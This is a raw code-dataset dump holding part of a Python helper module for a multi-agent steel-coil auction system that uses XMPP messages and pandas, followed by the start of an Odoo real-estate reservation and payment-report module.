element = element.replace(\"]\", \"\")\n y = json.loads(element)\n b = pd.DataFrame(y, index=[0])\n df = df.append(b)\n df = df.reset_index(drop=True)\n if args == \"coils\": # if ca is requesting\n df = df.loc[0, 'to_do'] == \"search_auction\"\n return df\n\ndef req_active_users_loc_times(agent_df, seq, list, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n va_request_df = agent_df #.loc[:, 'id':'time']\n va_request_df = va_request_df.astype(str)\n va_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n va_request_df.at[0, 'time'] = this_time\n va_request_df.at[0, 'seq'] = seq\n va_request_df.loc[0, 'list_coils'] = str(list)\n if args:\n va_request_df.at[0, 'request_type'] = args[0]\n else:\n va_request_df.at[0, 'request_type'] = \"active users location & op_time\"\n return va_request_df\n\ndef req_active_users_loc_times_coil(agent_df, seq, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n va_request_df = agent_df #.loc[:, 'id':'time']\n va_request_df = va_request_df.astype(str)\n va_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n va_request_df.at[0, 'time'] = this_time\n va_request_df.at[0, 'seq'] = seq\n va_request_df.loc[0, 'list_coils'] = str(list)\n if args:\n va_request_df.at[0, 'request_type'] = args[0]\n else:\n va_request_df.at[0, 'request_type'] = \"active users location & op_time\"\n return va_request_df\n\ndef req_coil_loc(agent_df, *args):\n \"\"\"Returns msg body to send to browser as a json\"\"\"\n coil_request_df = agent_df #.loc[:, 'id':'time']\n coil_request_df = coil_request_df.astype(str)\n coil_request_df.at[0, 'purpose'] = \"request\"\n this_time = datetime.datetime.now()\n coil_request_df.at[0, 'time'] = this_time\n if args:\n coil_request_df.at[0, 'request_type'] = args[0]\n else:\n coil_request_df.at[0, 'request_type'] = \"my location\"\n return coil_request_df.to_json()\n\ndef bids_mean(medias_list):\n if len(medias_list) > 3:\n medias_list = medias_list[-3:]\n medias_list = stats.mean(medias_list)\n return medias_list\n\ndef msg_to_browser(order_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n log_jid = agents_df['User name'].iloc[-1]\n order_msg = Message(to=log_jid)\n order_msg.body = order_body\n order_msg.set_metadata(\"performative\", \"inform\")\n return order_msg\n\ndef change_warehouse(launcher_df, my_dir):\n va = launcher_df.loc[0, 'list_ware'].split(',')\n lc = launcher_df.loc[0, 'list_coils'].split(',')\n wait_time = launcher_df.loc[0, 'wait_time']\n j = 0\n my_dir = os.getcwd()\n for z in lc:\n number = 1\n name = 'coil_00' + str(number)\n df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n for i in range(30):\n if df.loc[df.Name == name, 'Code'].isnull().any().any():\n cmd = f'python3 coil.py -an {str(number)} -l {va[j]} -c{z} -w{wait_time}'\n subprocess.Popen(cmd, stdout=None, stdin=None, stderr=None, close_fds=True, shell=True)\n break\n elif df.loc[df.Name == name, 'Code'].values == z:\n cmd = f'python3 coil.py -an {str(number)} -l {va[j]} -c{z} -w{wait_time}'\n subprocess.Popen(cmd, stdout=None, stdin=None, stderr=None, close_fds=True, shell=True)\n break\n else:\n number = number + 1\n if len(str(number)) < 2:\n name = 'coil_00' + str(number)\n else:\n name = 'coil_0' + str(number)\n time.sleep(5)\n j = j + 1\n\ndef order_file(agent_full_name, order_code, steel_grade, thickness, width_coils, num_coils, list_coils, each_coil_price,\n list_ware, string_operations, wait_time):\n order_msg_log = pd.DataFrame([], columns=['id', 'order_code', 'steel_grade', 'thickness_coils', 'width_coils',\n 'num_coils', 'list_coils', 'each_coil_price', 'string_operations',\n 'date'])\n order_msg_log.at[0, 'id'] = agent_full_name\n order_msg_log.at[0, 'purpose'] = 'setup'\n order_msg_log.at[0, 'msg'] = 'new order'\n order_msg_log.at[0, 'order_code'] = order_code\n order_msg_log.at[0, 'steel_grade'] = steel_grade\n order_msg_log.at[0, 'thickness_coils'] = thickness\n order_msg_log.at[0, 'width_coils'] = width_coils\n order_msg_log.at[0, 'num_coils'] = num_coils\n order_msg_log.at[0, 'list_coils'] = list_coils\n order_msg_log.at[0, 'each_coil_price'] = each_coil_price\n order_msg_log.at[0, 'list_ware'] = list_ware\n order_msg_log.at[0, 'string_operations'] = string_operations\n order_msg_log.at[0, 'date'] = date.today().strftime('%Y-%m-%d')\n order_msg_log.at[0, 'to'] = 'log'\n order_msg_log.at[0, 'wait_time'] = wait_time\n return order_msg_log\n\ndef order_code_log(coil_code, df, my_full_name):\n order_coil_df = pd.DataFrame([], columns=['Code'])\n order_coil_df.at[0, 'Code'] = coil_code\n order_coil_df.loc[0, 'purpose'] = \"location_coil\"\n order_coil_df.loc[0, 'id'] = my_full_name\n order_coil_df.loc[0, 'to'] = 'log@apiict00.etsii.upm.es'\n order_coil_df.loc[0, 'msg'] = df.loc[0, 'seq']\n order_coil_df = order_coil_df[['id', 'Code', 'purpose', 'msg', 'to']]\n return order_coil_df\n\ndef loc_of_coil(coil_df):\n loc_df = pd.DataFrame([], columns = ['location'])\n df = pd.read_csv('agents.csv', header=0, delimiter=\",\", engine='python')\n code = coil_df.loc[0, \"Code\"]\n location = df.loc[df.Code == code, 'location']\n location = location.values\n if location:\n location = location[0]\n loc_df.loc[0, 'location'] = location\n return loc_df\n else:\n coil_df = pd.DataFrame()\n return coil_df\n\ndef change_jid(my_dir, my_full_name):\n df = agents_data()\n df.loc[df.Name == my_full_name, 'Code'] = ''\n df.to_csv(f'{my_dir}''/''agents.csv', index=False, header=True)\n\ndef order_budget(budget, code):\n df = pd.DataFrame()\n df_agents = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n name = df_agents.loc[df_agents.Code == code, 'User name'].values\n name = name[0]\n df.loc[0, 'id'] = 'launcher'\n df.loc[0, 'purpose'] = 'setup'\n df.loc[0, 'msg'] = 'new budget'\n df.loc[0, 'budget'] = budget\n df.loc[0, 'code'] = str(code)\n df.loc[0, 'to'] = str(name)\n return df\n\ndef order_coil(la_json, code):\n df = pd.read_csv(f'agents.csv', header=0, delimiter=\",\", engine='python')\n name = df.loc[df.Code == code, 'User name'].values\n name = name[0]\n msg_budget = Message()\n msg_budget.to = str(name)\n msg_budget.body = la_json\n return msg_budget\n\n\n\n\n\n\n\n'''Functions to improve readability in messages. Improve functions'''\n\ndef request_browser(df, seq, list):\n df.loc[:, 'id':'request_type']\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n df.loc[0, 'msg'] = seq\n df.loc[0, 'coils'] = str(list)\n df = df[['id', 'purpose', 'request_type', 'msg', 'to']]\n return df\n\ndef answer_va(df_br, sender, df_va, coils, location):\n df = pd.DataFrame()\n df.loc[0, 'msg'] = df_va.loc[0, 'seq']\n df.loc[0, \"id\"] = 'browser'\n df.loc[0, \"coils\"] = coils\n df.loc[0, \"location\"] = location\n df.loc[0, \"purpose\"] = 'answer'\n df.loc[0, \"to\"] = sender\n df = df[['id', 'purpose', 'msg', 'coils', 'location', 'to']]\n return df\n\ndef answer_coil(df, sender, seq_df):\n df.loc[0, 'msg'] = seq_df.loc[0, 'msg']\n df.loc[0, \"id\"] = 'browser'\n df.loc[0, \"purpose\"] = 'answer'\n df.loc[0, \"to\"] = sender\n df = df[['id', 'purpose', 'msg','location', 'to']]\n return df\n\ndef send_va(my_full_name, number, auction_level, jid_list):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n if auction_level == 1:\n df.loc[0, 'msg'] = 'send pre-auction'\n elif auction_level == 2:\n df.loc[0, 'msg'] = 'send auction'\n elif auction_level == 3:\n df.loc[0, 'msg'] = 'send acceptance'\n df.loc[0, 'number'] = number\n df.loc[0, 'to'] = jid_list\n return df\n\ndef send_coil(my_full_name, seq):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'agent_type'] = 'coil'\n df.loc[0, 'purpose'] = 'request'\n df.loc[0, 'request_type'] = 'my location'\n df.loc[0, 'msg'] = seq\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n return df\n\ndef send_br_log(df, df_br, my_full_name):\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'answer'\n df.loc[0, 'msg'] = df_br.loc[0, 'msg']\n df.loc[0, 'to'] = 'browser@apiict00.etsii.upm.es'\n df = df[['id', 'purpose', 'msg', 'location', 'to']]\n return df.to_json(orient=\"records\")\n\ndef send_to_va_msg(my_full_name, bid, to, level):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'agent_type'] = 'coil'\n df.loc[0, 'purpose'] = 'inform'\n if level == '1':\n df.loc[0, 'msg'] = 'send bid'\n df.loc[0, 'Bid'] = bid\n elif level == 2:\n df.loc[0, 'msg'] = 'send counterbid'\n df.loc[0, 'counterbid'] = bid\n df.loc[0, 'to'] = to\n return df\n\ndef send_activation_finish(my_full_name, ip_machine, level):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n if level == 'start':\n df.loc[0, 'status'] = 'started'\n elif level == 'end':\n df.loc[0, 'status'] = 'ended'\n df.loc[0, 'IP'] = ip_machine\n return df.to_json(orient=\"records\")\n\ndef inform_error(msg):\n df = pd.DataFrame()\n df.loc[0, 'purpose'] = 'inform error'\n df.loc[0, 'msg'] = msg\n return df.to_json(orient=\"records\")\n\ndef inform_finish(msg):\n df = pd.DataFrame()\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = msg\n return df.to_json(orient=\"records\")\n\ndef won_auction(my_full_name, va_coil_msg_sender_f, this_time):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = f'won auction in {va_coil_msg_sender_f}'\n df.loc[0, 'time'] = this_time\n return df.to_json(orient=\"records\")\n\ndef finish_va_auction(my_full_name, number):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = f'finish auction number: {number}.'\n return df.to_json(orient=\"records\")\n\ndef order_register(my_full_name, code, coils, locations):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'new order from launcher'\n df.loc[0, 'code'] = code\n df.loc[0, 'coils'] = coils\n df.loc[0, 'locations'] = locations\n return df.to_json(orient=\"records\")\n\ndef log_status(my_full_name, status, ip_machine):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n df.loc[0, 'status'] = status\n df.loc[0, 'IP'] = ip_machine\n return df.to_json(orient=\"records\")\n\ndef coil_status(my_full_name):\n df = pd.DataFrame()\n df.loc[0, 'id'] = my_full_name\n df.loc[0, 'purpose'] = 'inform'\n df.loc[0, 'msg'] = 'change status'\n df.loc[0, 'status'] = 'sleep'\n return df.to_json(orient=\"records\")\n\n\n\n\n\n'''funciones Monica'''\ndef order_to_search(search_body, agent_full_name, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"browser\"]\n browser_jid = agents_df['User name'].iloc[-1]\n search_msg = Message(to=browser_jid)\n search_msg.body = 'Search:' + search_body + ':' + agent_full_name\n search_msg.set_metadata(\"performative\", \"inform\")\n return search_msg\n\ndef br_int_fab_df(agent_df):\n \"\"\"Returns df to send to interrupted fab coil\"\"\"\n agent_df.at[0, 'int_fab'] = 1\n return agent_df\n\ndef br_msg_to(msg_body):\n \"\"\"Returns msg object without destination\"\"\"\n msg = Message()\n msg.body = msg_body\n msg.set_metadata(\"performative\", \"inform\")\n return msg\n\ndef order_searched(filter, agent_request, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == agent_request]\n launcher_jid = agents_df['User name'].iloc[-1]\n order_searched_msg = Message(to=launcher_jid)\n order_searched_msg.body = 'Order searched:' + filter\n order_searched_msg.set_metadata(\"performative\", \"inform\")\n return order_searched_msg\n\ndef order_to_log(order_body, agent_directory):\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"log\"]\n log_jid = agents_df['User name'].iloc[-1]\n order_msg = Message(to=log_jid)\n order_msg.body = order_body\n order_msg.set_metadata(\"performative\", \"inform\")\n return order_msg\n\ndef checkFileExistance():\n try:\n with open('ActiveAgents.csv', 'r') as f:\n return True\n except FileNotFoundError as e:\n return False\n except IOError as e:\n return False\n\ndef alive_agent(agent_jid):\n msg_alive = Message(to=agent_jid)\n msg_alive.body = \"Alive: Agent\"\n msg_alive.set_metadata(\"performative\", \"inform\")\n return msg_alive\n\ndef aa_type(id):\n t = id.split('@')\n type = t[0]\n if type[:-2] == \"l\":\n s = \"log\"\n elif type[:-2] == \"brows\":\n s = \"browser\"\n elif type[:-2] == \"ca\":\n s = \"ca\"\n elif type[:-2] == \"wh\":\n s = \"wh\"\n elif type[:-2] == \"tc\":\n s = \"tc\"\n elif type[:-2] == \"launch\":\n s = \"launcher\"\n else:\n s = \"coil\"\n return s\n\ndef checkFile2Existance():\n try:\n with open('RegisterOrders.csv', 'r') as f:\n return True\n except FileNotFoundError as e:\n return False\n except IOError as e:\n return False\n\ndef update_coil_status(coil_id, status):\n df = pd.read_csv('RegisterOrders.csv', header=0, delimiter=\",\", engine='python')\n df.loc[(df.ID_coil.isin([coil_id])), 'coil_status'] = status\n df.to_csv('RegisterOrders.csv', index=False)\n\ndef save_order(msg):\n s = msg.split(':')\n code = s[4].split('\"')\n steel = s[6].split('\"')\n thick = s[8].split('}')\n width = s[10].split('}')\n num = s[12].split('}')\n list = s[14].split('\"')\n id_coil = list[1].split(',')\n price = s[16].split('}')\n dat = msg.split('\"')\n string_operations = s[18].split('\"')\n status = string_operations[1].split(';')\n i = 0\n n = int(num[0])\n while (i < n):\n lista_total = []\n lista_total.append({\n 'Date': dat[51],\n 'Order_code': code[1],\n 'Steel_grade': steel[1],\n 'Thickness': thick[0],\n 'Width_coils': width[0],\n 'Number_coils': num[0],\n 'ID_coil': id_coil[i],\n 'Price_coils': price[0],\n 'Operations': string_operations[1],\n 'coil_status': status[0]\n })\n columns = ['Date', 'Order_code', 'Steel_grade', 'Thickness', 'Width_coils', 'Number_coils', 'ID_coil',\n 'Price_coils', 'Operations', 'coil_status']\n df = pd.DataFrame(lista_total, columns=columns)\n with open('RegisterOrders.csv', 'a') as f:\n if os.path.getsize('RegisterOrders.csv') == 0:\n df.to_csv(f, header=True, index=False)\n else:\n df.to_csv(f, header=False, index=False)\n i += 1\n\ndef msg_to_launcher(msg, agent_directory):\n \"\"\"Returns msg object to send to launcher agent\"\"\"\n agents_df = agents_data()\n agents_df = agents_df.loc[agents_df['Name'] == \"launcher\"]\n jid = agents_df['User name'].iloc[-1]\n msg_la = Message(to=jid)\n msg_la.body = msg\n msg_la.set_metadata(\"performative\", \"inform\")\n return msg_la\n","repo_name":"jcollado7/DynReactProject","sub_path":"assistant_functions.py","file_name":"assistant_functions.py","file_ext":"py","file_size_in_byte":47770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"22894677476","text":"from openerp import models, fields, api, _\r\nimport datetime\r\nimport dateutil.parser\r\nfrom openerp.exceptions import ValidationError\r\nimport time\r\nfrom datetime import date\r\nfrom dateutil.relativedelta import relativedelta\r\nfrom openerp.tools import float_compare\r\n\r\n\r\nclass ReportReservationPayment(models.AbstractModel):\r\n _name = 'report.sky_height.reservation_payment_report_template'\r\n\r\n @api.multi\r\n def render_html(self, data):\r\n account_moves_lines = []\r\n account_moves = []\r\n self.model = self.env.context.get('active_model')\r\n\r\n if not data.get('ids'):\r\n data['ids'] = self.ids\r\n docs = self.env['rs.reservation'].browse(data['ids'])\r\n if docs:\r\n for doc in docs:\r\n for payment_strg in doc.payment_strg_ids:\r\n for move_line in payment_strg.payment_id.move_line_ids:\r\n account_moves_lines.append(move_line)\r\n if move_line.move_id not in account_moves:\r\n account_moves.append(move_line.move_id)\r\n\r\n updated_moves = []\r\n all_lines = []\r\n key_list = []\r\n if account_moves and len(account_moves) > 0:\r\n for x in range(0, len(account_moves)):\r\n move_from_to = str(account_moves[x].line_ids[0].account_id.id) + ' ' + \\\r\n str(account_moves[x].line_ids[1].account_id.id)\r\n updated_moves.append({'move_from_to': move_from_to, 'move': account_moves[x]})\r\n if move_from_to not in key_list:\r\n key_list.append(move_from_to)\r\n\r\n filter_updated_moves = []\r\n for key in key_list:\r\n append_list = []\r\n filter_results = filter(lambda move: move['move_from_to'] == key, updated_moves)\r\n for result in filter_results:\r\n append_list.append(result['move'])\r\n filter_updated_moves.append(append_list)\r\n\r\n debit_amount = 0\r\n credit_amount = 0\r\n partner_name = ''\r\n payment_method = ''\r\n debit_account = ''\r\n credit_account = ''\r\n updated_date = ''\r\n if filter_updated_moves and len(filter_updated_moves) > 0:\r\n for x in range(0, len(filter_updated_moves)):\r\n if filter_updated_moves[x] and len(filter_updated_moves[x]) > 0:\r\n for y in range(0, len(filter_updated_moves[x])):\r\n for move_line in filter_updated_moves[x][y].line_ids:\r\n partner_name = move_line.partner_id.name\r\n payment_method = move_line.journal_id.name\r\n updated_date = move_line.date\r\n if move_line.debit != 0:\r\n debit_amount += move_line.debit\r\n debit_account = move_line.account_id.name\r\n\r\n elif move_line.credit != 0:\r\n credit_amount += move_line.credit\r\n credit_account = move_line.account_id.name\r\n\r\n all_lines.append({'partner_id': partner_name, 'date': updated_date,\r\n 'journal_id': payment_method, 'account_id': debit_account,\r\n 'debit': debit_amount, 'credit': 0})\r\n\r\n all_lines.append({'partner_id': partner_name, 'date': updated_date,\r\n 'journal_id': payment_method, 'account_id': credit_account,\r\n 'debit': 0, 'credit': credit_amount})\r\n debit_amount = 0\r\n credit_amount = 0\r\n partner_name = ''\r\n payment_method = ''\r\n debit_account = ''\r\n credit_account = ''\r\n updated_date = ''\r\n\r\n docargs = {\r\n 'doc_ids': self.ids,\r\n 'doc_model': self.model,\r\n 'docs': docs,\r\n 'lines': all_lines\r\n }\r\n\r\n return self.env['report'].render('sky_height.reservation_payment_report_template', docargs)\r\n else:\r\n pass\r\n\r\n\r\nclass RsReservation(models.Model):\r\n _name = 'rs.reservation'\r\n # _inherit = ['mail.thread', 'ir.needaction_mixin']\r\n _order = 'id desc'\r\n\r\n @api.onchange('lead_id')\r\n def get_unit_ids(self):\r\n for val in self:\r\n if val.lead_id and val.lead_id.property_id:\r\n val.unit_ids = [(6, 0, [val.lead_id.property_id.id])]\r\n\r\n # Add constrain for save value in readonly condition\r\n @api.constrains('unit_ids')\r\n def _check_unit_ids(self):\r\n for val in self:\r\n # TODO Append responsible User to sales persons\r\n if val.unit_ids:\r\n for unit in val.unit_ids:\r\n val.user_ids |= unit.resp_user_id\r\n\r\n @api.onchange('unit_ids')\r\n def check_property_responsible(self):\r\n for val in self:\r\n # TODO Append responsible User to sales persons\r\n if val.unit_ids:\r\n for unit in val.unit_ids:\r\n val.user_ids |= unit.resp_user_id\r\n\r\n # Empty payment term when change units\r\n val.pay_strategy_id = False\r\n\r\n @api.multi\r\n @api.depends('unit_ids')\r\n def get_properties_prices(self):\r\n for rec in self:\r\n if rec.unit_ids:\r\n rec.property_price = sum(unit.lst_price for unit in rec.unit_ids)\r\n else:\r\n rec.property_price = 0.0\r\n\r\n @api.multi\r\n def get_group_of_logged_user(self):\r\n for obj in self:\r\n user = self.env['res.users'].browse(obj.env.uid)\r\n obj.admin_status = False if not user.has_group('sky_height.group_sky_height_admin') else True\r\n obj.sales_status = True if user.has_group('base.group_sale_salesman') or user.has_group(\r\n 'base.group_sale_salesman_all_leads') or user.has_group('base.group_sale_manager') else False\r\n\r\n @api.multi\r\n @api.onchange('customer_id')\r\n def get_partners(self):\r\n partners = []\r\n partner_obj = self.env['res.partner'].search([('customer', '=', True)])\r\n for partner in partner_obj:\r\n partners.append(partner.id)\r\n return {'domain': {'partner_ids': [('id', 'in', partners)]}}\r\n\r\n @api.model\r\n def _default_users(self):\r\n users = self.env.user\r\n active_id = self._context.get('active_id')\r\n if self._context.get('active_model') == 'res.users' and active_id:\r\n if active_id not in users.ids:\r\n users |= self.env['res.users'].browse(active_id)\r\n return users\r\n\r\n @api.constrains('user_ids')\r\n @api.onchange('user_ids')\r\n def get_sales_team_domain(self):\r\n team_ids = []\r\n team_obj = self.env['crm.team']\r\n teams = team_obj.search([])\r\n for user in self.user_ids:\r\n if user.sale_team_id:\r\n team_ids.append(user.sale_team_id.id)\r\n for team in teams:\r\n if team.user_id.id == user.id and team.id not in team_ids:\r\n team_ids.append(team.id)\r\n self.sales_team_ids = team_obj.search([('id', 'in', team_ids)])\r\n\r\n @api.onchange('user_ids')\r\n def get_domain_users(self):\r\n domain_users = []\r\n users = self.env['res.users'].search([])\r\n for user in users:\r\n if user.has_group('base.group_sale_salesman') or \\\r\n user.has_group('base.group_sale_salesman_all_leads') or \\\r\n user.has_group('base.group_sale_manager') or \\\r\n user.has_group('sky_height.sale_team_leader_group'):\r\n domain_users.append(user.id)\r\n return {'domain': {'user_ids': [('id', 'in', domain_users)]}}\r\n\r\n name = fields.Char(string=\"Reservation Name\")\r\n reservation_code = fields.Char(string=\"Reservation Code\", readonly=True, copy=False)\r\n conditions = fields.Text(string=\"Conditions\")\r\n project_id = fields.Many2one('project.project', _(\"Project\"), required=True, domain=[('is_kpi', '=', False)])\r\n phase_id = fields.Many2one('project.phase', _('Phase'), required=True)\r\n unit_ids = fields.Many2many('product.product', string=\"Properties\", required=True)\r\n pay_strategy_id = fields.Many2one('account.payment.term', string=\"Payment Strategy\")\r\n payment_strg_name = fields.Char(string=\"Payment Strategy\", related='pay_strategy_id.name', store=True)\r\n payment_term_discount = fields.Float(string=\"Payment Term Discount\",\r\n related=\"pay_strategy_id.payment_term_discount\", store=True, digits=(16, 6))\r\n lead_id = fields.Many2one('crm.lead', string=\"Lead\")\r\n client_accountant_id = fields.Many2one('res.users', string=\"Client Accountant\")\r\n marital_status = fields.Selection([('single', _(\"Single\")),\r\n ('married', _(\"Married\")),\r\n ('widowed', _(\"Widowed\")),\r\n ('divorced', _(\"Divorced\"))], _('Marital Status'),\r\n related='lead_id.marital_status')\r\n no_of_kids = fields.Integer(_('No. Of Family Member'))\r\n sales_type = fields.Selection([('direct', _(\"Direct\")), ('indirect', _(\"Indirect\")),\r\n ('individual_broker', _(\"Individual Broker\")),\r\n ('client_referral', _(\"Client Referral\")),\r\n ('employee_referral', _(\"Employee Referral\")), ('resale', _(\"Resale\")),\r\n ('upgrade', _(\"Upgrade\")), ('supplier_through_sales', _(\"Supplier Through Sales\")),\r\n ('supplier_through_company', _(\"Supplier Through Company\")), ], _('Sales Type'))\r\n\r\n source = fields.Selection([('facebook', _(\"Facebook\")), ('callcenter', _(\"Call Center\")), ('website', _(\"Website\")),\r\n ('broker', _(\"Broker\")), ('referral', _(\"Referral\")), ('ambassador', _(\"Ambassador\")),\r\n ('other', _(\"Other\")), ('self_generated', _(\"Self Generated\"))],\r\n string='Source')\r\n\r\n # related='lead_id.source'\r\n expire_date = fields.Datetime(string=\"Expiry Date\", compute='_compute_expire_dates')\r\n reservation_date = fields.Datetime(string=\"Reservation Date\")\r\n reservation_expiry_date = fields.Datetime(string=\"Reservation Expiry Date\", compute='_compute_expire_dates')\r\n expire_date_difference = fields.Integer(string='Expire Difference', compute='_compute_expire_dates',\r\n store=True)\r\n confirm_date = fields.Datetime(string=\"Confirmation Date\")\r\n customer_id = fields.Many2one('res.partner', string=\"Customer\", required=True,\r\n domain=[('customer', '=', True), ('parent_id', '=', False)])\r\n address = fields.Char(string=\"Address\", related='customer_id.street')\r\n phone = fields.Char(string=\"Phone\", related='customer_id.phone')\r\n mobile = fields.Char(string=\"Mobile1\", related='customer_id.mobile')\r\n email = fields.Char(string=\"Email\", related='customer_id.email')\r\n user_ids = fields.Many2many('res.users', string=\"Sales Representative\", required=True, default=_default_users,\r\n )\r\n team_leader_ids = fields.Many2many('res.users', 'leader_reservation_user_rel', 'reservation_id', 'user_id',\r\n string='Team Leaders', compute='get_leader_and_manager', store=True)\r\n sales_manager_ids = fields.Many2many('res.users', 'manager_reservation_user_rel', 'reservation_id', 'user_id',\r\n string='Sales Manager', compute='get_leader_and_manager', store=True)\r\n id_no = fields.Char(string=\"Identification No.\")\r\n id_type = fields.Selection([('id', _(\"ID\")), ('passport', _(\"Passport\"))], string=\"Identification Type\")\r\n id_photo = fields.Binary(\"Photo ID\")\r\n property_price = fields.Float(string=\"Property Price\", compute=\"get_properties_prices\", readonly=True,\r\n digits=(16, 6))\r\n discount = fields.Float(string=\"Discount Percentage\", digits=(16, 15))\r\n total_discount = fields.Float('Total Discount', compute='_compute_total_discount', store=True)\r\n add_extension = fields.Boolean(string=\"Add Extension\")\r\n admin_status = fields.Boolean(string=\"under admin group\", compute='get_group_of_logged_user', default=True)\r\n sales_status = fields.Boolean(string=\"under Sales group\", compute='get_group_of_logged_user', default=False)\r\n net_price = fields.Float(string=\"Net Price\", compute='_calc_net_price', store=True, digits=(16, 6))\r\n discount_approval = fields.Boolean(string='Discount Approval')\r\n broker_ids = fields.Many2many('res.partner', 'res_broker_rel', 'product_id', 'res_id', _('Brokers'),\r\n domain=[('is_broker', '=', True)])\r\n sales_team_ids = fields.Many2many('crm.team', string=\"Sales Team\")\r\n hide_payment_button = fields.Boolean(string=\"Hide\")\r\n button_broker_paid = fields.Boolean(string=\"Hide Broker Payment button\")\r\n button_salescommission_paid = fields.Boolean(string=\"Hide Sales Commission Payment button\", default=False)\r\n receive_checks = fields.Boolean(string=\"Receive Checks\")\r\n undercollection_check = fields.Boolean(string=\"Under Collection\")\r\n initalized_check = fields.Boolean(string=\"Initalize\")\r\n reviewed_check = fields.Boolean(string=\"Review\")\r\n cancelled = fields.Boolean('Cancelled')\r\n approve_cancellation = fields.Boolean('Approve Cancellation')\r\n payment_approval = fields.Boolean(string='Payment Approval')\r\n request_exception = fields.Text('Exception Request')\r\n sale_order_id = fields.Many2one('sale.order', _('Order'), readonly=True)\r\n payment_strg_ids = fields.One2many('payment.strg', 'reserve_id', _('Payment'))\r\n is_payment_strg = fields.Boolean('Is Payment', default=False)\r\n attach_ids = fields.One2many('ir.attachment', 'reserve_id', string='Legal Papers')\r\n payment_attach_ids = fields.One2many('ir.attachment', 'cancel_reserve_id', string='Cancellation Papers')\r\n account_invoice_ids = fields.One2many('account.invoice', 'reserve_id', string='Commissions')\r\n state = fields.Selection([('draft', _(\"Draft\")), ('request_exception', _(\"Request For Exception\")),\r\n ('exception_approval', _(\"Exception Approved\")), ('in_progress', _(\"Reserved\")),\r\n ('confirm', _(\"Checks Received\")), ('under_collection', _(\"Under Collection\")),\r\n ('initialize', _(\"Contract Initialized\")), ('review', _(\"Contract Reviewed\")),\r\n ('create_so', _(\"Contracted\")), ('cancel', _(\"Cancel\"))], _('Status'), default='draft')\r\n receive_checks_journal_entry_id = fields.Many2one('account.move', _('Receive Checks'))\r\n under_collection__journal_entry_id = fields.Many2one('account.move', _('Under Collection'))\r\n\r\n # log users\r\n request_user_id = fields.Many2one('res.users', string=\"Requested By\")\r\n exception_approval_user_id = fields.Many2one('res.users', string=\"Exception Approved By\")\r\n exception_rejection_user_id = fields.Many2one('res.users', string=\"Exception Rejected By\")\r\n in_progress_user_id = fields.Many2one('res.users', string=\"Reserved By\")\r\n confirm_user_id = fields.Many2one('res.users', string=\"Confirmed By\")\r\n initialize_user_id = fields.Many2one('res.users', string=\"Contract Initialized By\")\r\n review_user_id = fields.Many2one('res.users', string=\"Contract Reviewed By\")\r\n contract_user_id = fields.Many2one('res.users', string=\"Contracted By\")\r\n cancel_user_id = fields.Many2one('res.users', string=\"Cancelled By\")\r\n\r\n mobile1_type = fields.Selection([('local', 'Local'), ('foreign', 'Foreign')], related='customer_id.mobile1_type',\r\n string=\"Mobile1 Type\")\r\n mobile2 = fields.Char('Mobile 2', related='customer_id.mobile2')\r\n mobile2_type = fields.Selection([('local', 'Local'), ('foreign', 'Foreign')], related='customer_id.mobile2_type',\r\n string=\"Mobile2 Type\")\r\n\r\n partner_ids = fields.Many2many('res.partner', string=\"Partners\", domain=get_partners)\r\n partners_name = fields.Char('Partners', compute='_get_partners_name')\r\n function = fields.Char('Job Title', related='customer_id.function')\r\n pdc_id = fields.Many2one('pds.status', \"Payment Method\")\r\n sales_customer_id = fields.Many2one('res.partner', string=\"Customer\")\r\n sales_employee_id = fields.Many2one('hr.employee', string=\"Employee\")\r\n currency_id = fields.Many2one('res.currency', compute='_get_company_currency',\r\n string=\"Currency\", help='Utility field to express amount currency')\r\n\r\n other = fields.Char(\"Other\")\r\n commission_flag = fields.Boolean(compute='_commission_flag')\r\n is_commission_created = fields.Boolean('Is Commission Created')\r\n created_date = fields.Datetime(string=\"Created on\", default=fields.datetime.today())\r\n\r\n _defaults = {\r\n 'created_date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),\r\n }\r\n\r\n @api.depends('account_invoice_ids')\r\n def _commission_flag(self):\r\n for rec in self:\r\n if rec.account_invoice_ids and rec.account_invoice_ids.ids:\r\n rec.commission_flag = True\r\n\r\n @api.multi\r\n @api.depends('user_ids', 'sales_team_ids')\r\n def get_leader_and_manager(self):\r\n user_obj = self.env['res.users']\r\n for record in self:\r\n team_leader_ids = []\r\n sales_manager_ids = []\r\n teams = self.env['crm.team'].search([])\r\n\r\n for user in record.user_ids:\r\n if user.sale_team_id and user.sale_team_id.user_id:\r\n if user.sale_team_id.user_id.id not in team_leader_ids:\r\n 